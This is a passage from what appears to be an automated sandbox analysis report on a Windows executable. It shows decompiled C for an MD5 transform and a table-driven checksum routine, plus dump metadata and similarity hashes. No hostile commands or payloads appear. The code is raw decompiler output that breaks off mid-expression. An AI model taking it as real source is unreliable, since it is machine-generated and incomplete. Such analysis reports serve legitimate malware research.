				signed int _t634;
				signed int _t639;
				signed int _t641;
				signed int _t643;
				signed int _t651;
				signed int _t653;
				signed int _t655;
				signed int _t657;
				signed int _t659;
				signed int _t661;
				signed int _t663;
				signed int _t666;
				signed int _t671;
				signed int _t674;
				signed int _t677;
				signed int _t685;
				signed int _t688;
				signed int _t691;
				void* _t692;

				_t109 =  *(_t692 + 0x54);
				_t546 =  *((intOrPtr*)(_t692 + 0x58)) + 2;
				_t329 = _t109[1];
				_t671 = _t109[2];
				 *(_t692 + 0x14) =  *_t109;
				_t624 = _t692 + 0x24;
				 *(_t692 + 0x18) = _t109[3];
				_t587 = 0x10;
				do {
					_t359 = _t546[1] & 0x000000ff;
					_t111 =  *_t546 & 0x000000ff;
					_t546 =  &(_t546[4]);
					 *_t624 = ((_t359 << 0x00000008 | _t111) << 0x00000008 |  *(_t546 - 5) & 0x000000ff) << 0x00000008 |  *(_t546 - 6) & 0x000000ff;
					_t624 =  &(_t624[1]);
					_t587 = _t587 - 1;
				} while (_t587 != 0);
				_t625 =  *(_t692 + 0x14);
				asm("rol edx, 0x7");
				_t550 =  *((intOrPtr*)(_t692 + 0x10)) + 0xd76aa478 + ( !_t329 & _t625 | _t671 & _t329) +  *((intOrPtr*)(_t692 + 0x20)) + _t329;
				asm("rol esi, 0xc");
				_t628 = _t625 + 0xe8c7b756 + ( !_t550 & _t671 | _t329 & _t550) +  *(_t692 + 0x24) + _t550;
				asm("ror edi, 0xf");
				_t590 = _t671 + 0x242070db + ( !_t628 & _t329 | _t628 & _t550) +  *((intOrPtr*)(_t692 + 0x28)) + _t628;
				asm("ror ebx, 0xa");
				_t332 = _t329 + 0xc1bdceee + ( !_t590 & _t550 | _t628 & _t590) +  *((intOrPtr*)(_t692 + 0x2c)) + _t590;
				asm("rol edx, 0x7");
				_t552 = _t550 + ( !_t332 & _t628 | _t590 & _t332) + 0xf57c0faf +  *((intOrPtr*)(_t692 + 0x30)) + _t332;
				asm("rol esi, 0xc");
				_t630 = _t628 + ( !_t552 & _t590 | _t332 & _t552) + 0x4787c62a +  *((intOrPtr*)(_t692 + 0x34)) + _t552;
				asm("ror edi, 0xf");
				_t592 = _t590 + ( !_t630 & _t332 | _t630 & _t552) + 0xa8304613 +  *((intOrPtr*)(_t692 + 0x38)) + _t630;
				asm("ror ebx, 0xa");
				_t334 = _t332 + ( !_t592 & _t552 | _t630 & _t592) + 0xfd469501 +  *((intOrPtr*)(_t692 + 0x3c)) + _t592;
				asm("rol edx, 0x7");
				_t554 = _t552 + ( !_t334 & _t630 | _t592 & _t334) + 0x698098d8 +  *((intOrPtr*)(_t692 + 0x40)) + _t334;
				_t27 = _t554 + 0x6b901122; // -1809486614
				asm("rol esi, 0xc");
				_t632 = _t630 + ( !_t554 & _t592 | _t334 & _t554) + 0x8b44f7af +  *((intOrPtr*)(_t692 + 0x44)) + _t554;
				asm("ror ebp, 0xf");
				_t674 = _t592 - 0xa44f + ( !_t632 & _t334 | _t632 & _t554) +  *((intOrPtr*)(_t692 + 0x48)) + _t632;
				 *(_t692 + 0x14) = _t674;
				asm("ror ebx, 0xa");
				_t336 = _t334 + ( !_t674 & _t554 | _t632 & _t674) + 0x895cd7be +  *((intOrPtr*)(_t692 + 0x4c)) + _t674;
				 *(_t692 + 0x18) = _t336;
				asm("rol edi, 0x7");
				_t595 = _t27 + ( !_t336 & _t632 | _t674 & _t336) +  *((intOrPtr*)(_t692 + 0x50)) + _t336;
				 *(_t692 + 0x1c) = _t595;
				asm("rol ebp, 0xc");
				_t677 = _t632 - 0x2678e6d +  *(_t692 + 0x54) + ( !_t595 & _t674 | _t336 & _t595) + _t595;
				_t634 =  !_t677;
				asm("ror ebx, 0xf");
				_t340 =  *(_t692 + 0x14) + 0xa679438e + (_t634 & _t336 | _t677 & _t595) +  *((intOrPtr*)(_t692 + 0x58)) + _t677;
				_t556 =  !_t340;
				asm("ror edi, 0xa");
				_t599 =  *(_t692 + 0x18) + 0x49b40821 + (_t556 & _t595 | _t677 & _t340) +  *((intOrPtr*)(_t692 + 0x5c)) + _t340;
				asm("rol esi, 0x5");
				_t639 = (_t634 & _t340 | _t677 & _t599) +  *(_t692 + 0x24) +  *(_t692 + 0x1c) + 0xf61e2562 + _t599;
				asm("rol edx, 0x9");
				_t562 = (_t556 & _t599 | _t340 & _t639) + 0xc040b340 +  *((intOrPtr*)(_t692 + 0x38)) + _t677 + _t639;
				asm("rol ebx, 0xe");
				_t342 = _t340 + ( !_t599 & _t639 | _t562 & _t599) + 0x265e5a51 +  *((intOrPtr*)(_t692 + 0x4c)) + _t562;
				asm("ror edi, 0xc");
				_t601 = _t599 + ( !_t639 & _t562 | _t342 & _t639) + 0xe9b6c7aa +  *((intOrPtr*)(_t692 + 0x20)) + _t342;
				asm("rol esi, 0x5");
				_t641 = _t639 + ( !_t562 & _t342 | _t562 & _t601) + 0xd62f105d +  *((intOrPtr*)(_t692 + 0x34)) + _t601;
				asm("rol edx, 0x9");
				_t564 = _t562 + ( !_t342 & _t601 | _t342 & _t641) + 0x2441453 +  *((intOrPtr*)(_t692 + 0x48)) + _t641;
				asm("rol ebx, 0xe");
				_t344 = _t342 + ( !_t601 & _t641 | _t564 & _t601) + 0xd8a1e681 +  *((intOrPtr*)(_t692 + 0x5c)) + _t564;
				asm("ror edi, 0xc");
				_t603 = _t601 + ( !_t641 & _t564 | _t344 & _t641) + 0xe7d3fbc8 +  *((intOrPtr*)(_t692 + 0x30)) + _t344;
				asm("rol esi, 0x5");
				_t643 = _t641 + ( !_t564 & _t344 | _t564 & _t603) + 0x21e1cde6 +  *((intOrPtr*)(_t692 + 0x44)) + _t603;
				asm("rol ebp, 0x9");
				_t685 = ( !_t344 & _t603 | _t344 & _t643) + 0xc33707d6 +  *((intOrPtr*)(_t692 + 0x58)) + _t564 + _t643;
				asm("rol ebx, 0xe");
				_t346 = _t344 + ( !_t603 & _t643 | _t685 & _t603) + 0xf4d50d87 +  *((intOrPtr*)(_t692 + 0x2c)) + _t685;
				asm("ror edi, 0xc");
				_t605 = _t603 + ( !_t643 & _t685 | _t346 & _t643) + 0x455a14ed +  *((intOrPtr*)(_t692 + 0x40)) + _t346;
				 *(_t692 + 0x1c) = _t605;
				asm("rol edx, 0x5");
				_t567 = _t643 - 0x561c16fb +  *(_t692 + 0x54) + ( !_t685 & _t346 | _t685 & _t605) + _t605;
				asm("rol esi, 0x9");
				_t651 = ( !_t346 & _t605 | _t346 & _t567) + 0xfcefa3f8 +  *((intOrPtr*)(_t692 + 0x28)) + _t685 + _t567;
				asm("rol edi, 0xe");
				_t608 = _t346 + 0x676f02d9 + ( !_t605 & _t567 | _t651 & _t605) +  *((intOrPtr*)(_t692 + 0x3c)) + _t651;
				asm("ror ebx, 0xc");
				_t350 =  *(_t692 + 0x1c) + 0x8d2a4c8a + ( !_t567 & _t651 | _t608 & _t567) +  *((intOrPtr*)(_t692 + 0x50)) + _t608;
				asm("rol edx, 0x4");
				_t569 = _t567 + (_t651 ^ _t608 ^ _t350) + 0xfffa3942 +  *((intOrPtr*)(_t692 + 0x34)) + _t350;
				asm("rol esi, 0xb");
				_t653 = _t651 + (_t608 ^ _t350 ^ _t569) + 0x8771f681 +  *((intOrPtr*)(_t692 + 0x40)) + _t569;
				asm("rol edi, 0x10");
				_t610 = _t608 + (_t653 ^ _t350 ^ _t569) + 0x6d9d6122 +  *((intOrPtr*)(_t692 + 0x4c)) + _t653;
				_t521 = _t653 ^ _t610;
				asm("ror ebx, 0x9");
				_t352 = _t350 + (_t521 ^ _t569) + 0xfde5380c +  *((intOrPtr*)(_t692 + 0x58)) + _t610;
				asm("rol edx, 0x4");
				_t571 = _t569 + (_t521 ^ _t352) + 0xa4beea44 +  *(_t692 + 0x24) + _t352;
				asm("rol esi, 0xb");
				_t655 = _t653 + (_t610 ^ _t352 ^ _t571) + 0x4bdecfa9 +  *((intOrPtr*)(_t692 + 0x30)) + _t571;
				asm("rol edi, 0x10");
				_t612 = _t610 + (_t655 ^ _t352 ^ _t571) + 0xf6bb4b60 +  *((intOrPtr*)(_t692 + 0x3c)) + _t655;
				_t526 = _t655 ^ _t612;
				asm("ror ebx, 0x9");
				_t354 = _t352 + (_t526 ^ _t571) + 0xbebfbc70 +  *((intOrPtr*)(_t692 + 0x48)) + _t612;
				asm("rol ebp, 0x4");
				_t688 = _t571 + 0x289b7ec6 +  *(_t692 + 0x54) + (_t526 ^ _t354) + _t354;
				asm("rol esi, 0xb");
				_t657 = _t655 + (_t612 ^ _t354 ^ _t688) + 0xeaa127fa +  *((intOrPtr*)(_t692 + 0x20)) + _t688;
				asm("rol edi, 0x10");
				_t614 = _t612 + (_t657 ^ _t354 ^ _t688) + 0xd4ef3085 +  *((intOrPtr*)(_t692 + 0x2c)) + _t657;
				_t530 = _t657 ^ _t614;
				asm("ror edx, 0x9");
				_t577 = (_t530 ^ _t688) + 0x4881d05 +  *((intOrPtr*)(_t692 + 0x38)) + _t354 + _t614;
				asm("rol ecx, 0x4");
				_t535 = (_t530 ^ _t577) + 0xd9d4d039 +  *((intOrPtr*)(_t692 + 0x44)) + _t688 + _t577;
				asm("rol esi, 0xb");
				_t659 = _t657 + (_t614 ^ _t577 ^ _t535) + 0xe6db99e5 +  *((intOrPtr*)(_t692 + 0x50)) + _t535;
				asm("rol edi, 0x10");
				_t616 = _t614 + (_t659 ^ _t577 ^ _t535) + 0x1fa27cf8 +  *((intOrPtr*)(_t692 + 0x5c)) + _t659;
				asm("ror edx, 0x9");
				_t579 = _t577 + (_t659 ^ _t616 ^ _t535) + 0xc4ac5665 +  *((intOrPtr*)(_t692 + 0x28)) + _t616;
				asm("rol ecx, 0x6");
				_t537 = _t535 + (( !_t659 | _t579) ^ _t616) + 0xf4292244 +  *((intOrPtr*)(_t692 + 0x20)) + _t579;
				asm("rol esi, 0xa");
				_t661 = _t659 + (( !_t616 | _t537) ^ _t579) + 0x432aff97 +  *((intOrPtr*)(_t692 + 0x3c)) + _t537;
				asm("rol edi, 0xf");
				_t618 = _t616 + (( !_t579 | _t661) ^ _t537) + 0xab9423a7 +  *((intOrPtr*)(_t692 + 0x58)) + _t661;
				asm("ror edx, 0xb");
				_t581 = _t579 + (( !_t537 | _t618) ^ _t661) + 0xfc93a039 +  *((intOrPtr*)(_t692 + 0x34)) + _t618;
				asm("rol ecx, 0x6");
				_t539 = _t537 + (( !_t661 | _t581) ^ _t618) + 0x655b59c3 +  *((intOrPtr*)(_t692 + 0x50)) + _t581;
				asm("rol esi, 0xa");
				_t663 = _t661 + (( !_t618 | _t539) ^ _t581) + 0x8f0ccc92 +  *((intOrPtr*)(_t692 + 0x2c)) + _t539;
				asm("rol edi, 0xf");
				_t620 = _t618 + (( !_t581 | _t663) ^ _t539) + 0xffeff47d +  *((intOrPtr*)(_t692 + 0x48)) + _t663;
				asm("ror edx, 0xb");
				_t583 = _t581 + (( !_t539 | _t620) ^ _t663) + 0x85845dd1 +  *(_t692 + 0x24) + _t620;
				asm("rol ecx, 0x6");
				_t541 = _t539 + (( !_t663 | _t583) ^ _t620) + 0x6fa87e4f +  *((intOrPtr*)(_t692 + 0x40)) + _t583;
				asm("rol ebx, 0xa");
				_t357 = _t663 - 0x1d31920 + (( !_t620 | _t541) ^ _t583) +  *((intOrPtr*)(_t692 + 0x5c)) + _t541;
				asm("rol edi, 0xf");
				_t622 = _t620 + (( !_t583 | _t357) ^ _t541) + 0xa3014314 +  *((intOrPtr*)(_t692 + 0x38)) + _t357;
				asm("ror ebp, 0xb");
				_t691 = _t583 + 0x4e0811a1 +  *(_t692 + 0x54) + (( !_t541 | _t622) ^ _t357) + _t622;
				_t623 =  *((intOrPtr*)(_t692 + 0x64));
				asm("rol esi, 0x6");
				_t666 = _t541 - 0x8ac817e + (( !_t357 | _t691) ^ _t622) +  *((intOrPtr*)(_t692 + 0x30)) + _t691;
				asm("rol edx, 0xa");
				_t586 = _t357 - 0x42c50dcb + (( !_t622 | _t666) ^ _t691) +  *((intOrPtr*)(_t692 + 0x4c)) + _t666;
				asm("rol ecx, 0xf");
				_t544 = _t622 + 0x2ad7d2bb + (( !_t691 | _t586) ^ _t666) +  *((intOrPtr*)(_t692 + 0x28)) + _t586;
				 *_t623 =  *((intOrPtr*)(_t692 + 0x10)) + _t666;
				 *((intOrPtr*)(_t623 + 8)) =  *((intOrPtr*)(_t623 + 8)) + _t544;
				asm("ror eax, 0xb");
				_t328 = _t691 - 0x14792c6f + (( !_t666 | _t544) ^ _t586) +  *((intOrPtr*)(_t692 + 0x44)) +  *((intOrPtr*)(_t623 + 4)) + _t544;
				 *((intOrPtr*)(_t623 + 0xc)) =  *((intOrPtr*)(_t623 + 0xc)) + _t586;
				 *((intOrPtr*)(_t623 + 4)) = _t328;
				return _t328;
			}

0x0040c83b
0x0040c847
0x0040c84a
0x0040c84d
0x0040c857
0x0040c85b
0x0040c85f
0x0040c863
0x0040c864
0x0040c864
0x0040c868
0x0040c86b
0x0040c885
0x0040c887
0x0040c88a
0x0040c88a
0x0040c88d
0x0040c8bb
0x0040c8be
0x0040c8d0
0x0040c8d3
0x0040c8ef
0x0040c8f2
0x0040c906
0x0040c909
0x0040c923
0x0040c926
0x0040c93e
0x0040c941
0x0040c95b
0x0040c95e
0x0040c980
0x0040c983
0x0040c99d
0x0040c9a0
0x0040c9ac
0x0040c9be
0x0040c9c1
0x0040c9d7
0x0040c9da
0x0040c9de
0x0040c9f8
0x0040c9fb
0x0040c9ff
0x0040ca13
0x0040ca16
0x0040ca1a
0x0040ca32
0x0040ca35
0x0040ca39
0x0040ca57
0x0040ca5a
0x0040ca60
0x0040ca7c
0x0040ca7f
0x0040ca9c
0x0040ca9f
0x0040cab3
0x0040cab6
0x0040cace
0x0040cad3
0x0040caed
0x0040caf2
0x0040cb08
0x0040cb0d
0x0040cb25
0x0040cb2a
0x0040cb42
0x0040cb47
0x0040cb65
0x0040cb6a
0x0040cb82
0x0040cb87
0x0040cba1
0x0040cba4
0x0040cbbc
0x0040cbc1
0x0040cbd9
0x0040cbde
0x0040cbe4
0x0040cbf2
0x0040cbf5
0x0040cc13
0x0040cc16
0x0040cc36
0x0040cc3b
0x0040cc4f
0x0040cc52
0x0040cc65
0x0040cc68
0x0040cc77
0x0040cc7a
0x0040cc8f
0x0040cc92
0x0040cc94
0x0040cca7
0x0040ccaa
0x0040ccbc
0x0040ccbf
0x0040ccce
0x0040ccd7
0x0040ccec
0x0040ccef
0x0040ccf1
0x0040cd04
0x0040cd07
0x0040cd13
0x0040cd16
0x0040cd25
0x0040cd28
0x0040cd3d
0x0040cd40
0x0040cd42
0x0040cd56
0x0040cd59
0x0040cd6b
0x0040cd6e
0x0040cd7d
0x0040cd80
0x0040cd95
0x0040cd98
0x0040cdab
0x0040cdae
0x0040cdc5
0x0040cdc8
0x0040cddd
0x0040cde0
0x0040cdf5
0x0040cdf8
0x0040ce0d
0x0040ce10
0x0040ce25
0x0040ce28
0x0040ce3d
0x0040ce40
0x0040ce55
0x0040ce58
0x0040ce6d
0x0040ce70
0x0040ce83
0x0040ce86
0x0040ceaa
0x0040cead
0x0040cec8
0x0040cecb
0x0040cedd
0x0040cee4
0x0040cef4
0x0040cef8
0x0040cefb
0x0040cf0b
0x0040cf0e
0x0040cf20
0x0040cf23
0x0040cf25
0x0040cf27
0x0040cf3c
0x0040cf42
0x0040cf44
0x0040cf47
0x0040cf51

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
Instruction ID: 6ef1de5262991055bf8ff344baa4316f75fa1d5ea4f76780d655809ec32a4ba1
Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
Instruction Fuzzy Hash: 8812B5B3B546144BD70CCE1DCCA23A9B2D3ABD4218B0E853DB48AD3341EA7DD9198685

Uniqueness

Uniqueness Score: -1.00%

Function 004102F0, Relevance: .2, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004102F0() {
				signed int _t98;
				signed char _t103;
				signed char _t150;
				unsigned int _t152;
				signed char _t167;
				signed int _t178;
				signed int _t213;
				signed int* _t257;
				signed char* _t258;
				unsigned int _t259;
				unsigned int _t262;
				void* _t264;

				_t214 =  *(_t264 + 4);
				_t150 =  *(_t264 + 0xc);
				_t259 =  *(_t264 + 0x14);
				_t98 =  !((( *(_t264 + 4) & 0x0000ff00) + ( *(_t264 + 4) << 0x10) << 8) + (_t214 >> 0x00000008 & 0x0000ff00) + (_t214 >> 0x18));
				if(_t259 != 0) {
					while((_t150 & 0x00000003) != 0) {
						_t213 =  *_t150 & 0x000000ff;
						_t150 = _t150 + 1;
						_t98 = _t98 << 0x00000008 ^  *(0x4141c8 + (_t98 >> 0x00000018 ^ _t213) * 4);
						_t259 = _t259 - 1;
						if(_t259 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				_t257 = _t150 - 4;
				if(_t259 >= 0x20) {
					_t262 = _t259 >> 5;
					do {
						_t248 =  *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + 